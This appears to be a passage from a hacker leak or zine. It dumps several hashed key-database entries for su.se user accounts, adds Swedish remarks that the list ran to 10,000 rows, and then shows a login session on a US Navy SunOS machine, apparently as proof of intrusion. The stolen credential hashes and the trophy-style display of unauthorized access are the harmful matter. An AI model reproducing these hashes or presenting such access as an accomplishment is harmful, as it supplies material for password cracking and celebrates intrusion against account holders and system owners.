2561. [email protected] 1::16:b323f89e380be661349be65efbf7f7d58a98ce86f167bcfb:-::3:a1fdc2156d3bc758:-::2:a1fdc2156d3bc758:-::1:a1fdc2156d3bc758:-::3:2a8f94e58a40b0e6:3/""::2:2a8f94e58a40b0e6:3/""::1:2a8f94e58a40b0e6:3/""::3:a8b0d697f1918a8a:10/"su.se"::2:a8b0d697f1918a8a:10/"su.se"::1:a8b0d697f1918a8a:10/"su.se" 20020506120419:[email protected] - - - - - - 110 20020513153445:60160:0
2562. [email protected] 1::16:3bbc4a5ed0625ec123bf7ff786ecc19220f45ec275b59e94:-::3:f43e163e51085e01:-::2:f43e163e51085e01:-::1:f43e163e51085e01:-::3:7f26c7735e0bb90d:3/""::2:7f26c7735e0bb90d:3/""::1:7f26c7735e0bb90d:3/""::3:a29ed3a4ea91f2a2:10/"su.se"::2:a29ed3a4ea91f2a2:10/"su.se"::1:a29ed3a4ea91f2a2:10/"su.se" 20020415070114:[email protected] - - - - - - 110 20020513153445:61212:0
2563. [email protected] 1::16:3b54da19a70d67ab400b709873f808f88975136be9b98080:-::3:107694082697f473:-::2:107694082697f473:-::1:107694082697f473:-::3:97e92cb9078c20fb:3/""::2:97e92cb9078c20fb:3/""::1:97e92cb9078c20fb:3/""::3:8a61dcb367ef9bb0:10/"su.se"::2:8a61dcb367ef9bb0:10/"su.se"::1:8a61dcb367ef9bb0:10/"su.se" 20020325150412:[email protected] - - - - - - 110 20020513153445:62425:0
2564.  
2565. #
2566. #H�r fortsatte listj�veln med 10000 rader, k�nns inte som vi orkar med det.
2567. #
2568.  
2569. ...
2570. Och detta var alts� pudelns k�rna
2571.  
2572.  
2573. +-----------------------------------------------------------------------------+>
2574. Sun Microsystems Inc. SunOS 5.8 Generic February 2000
2575.  
2576. WARNING: This is a U. S. Government Computer System.
2577. Unauthorized access is prohibited by
2578. Title 18, United States Code, Section 1030
2579. --------------- Only UNCLASSIFIED Material On This Machine -----------------
2580.  
2581. Department of the Navy Automated Information Systems and related
2582. equipment are intended for the communication, processing and storage
2583. of U.S. Government information. These systems and equipment are subject
2584. to monitoring to ensure proper functioning, to protect against
2585. improper or unauthorized use or access, and to verify the presence or
2586. performance of applicable security features or procedures, and for other
2587. like purposes. Such monitoring may result in the acquisition, recording,
2588. and analysis of all data being communicated, transmitted, processed
2589. or stored in this system by a user. If monitoring reveals evidence of
2590. possible criminal activity, such evidence may be provided to law
2591. enforcement personnel. Use of this system constitutes consent to such
2592. monitoring.
2593.  
2594. Use of this or any other DoD interest computer system
2595. constitutes a consent to monitoring at all times.
2596.  
2597. You have mail.
2598. source idl_setup
2599. Enabling TeX & LaTeX
2600.  
2601. #
2602.  
2603. +-----------------------------------------------------------------------------+>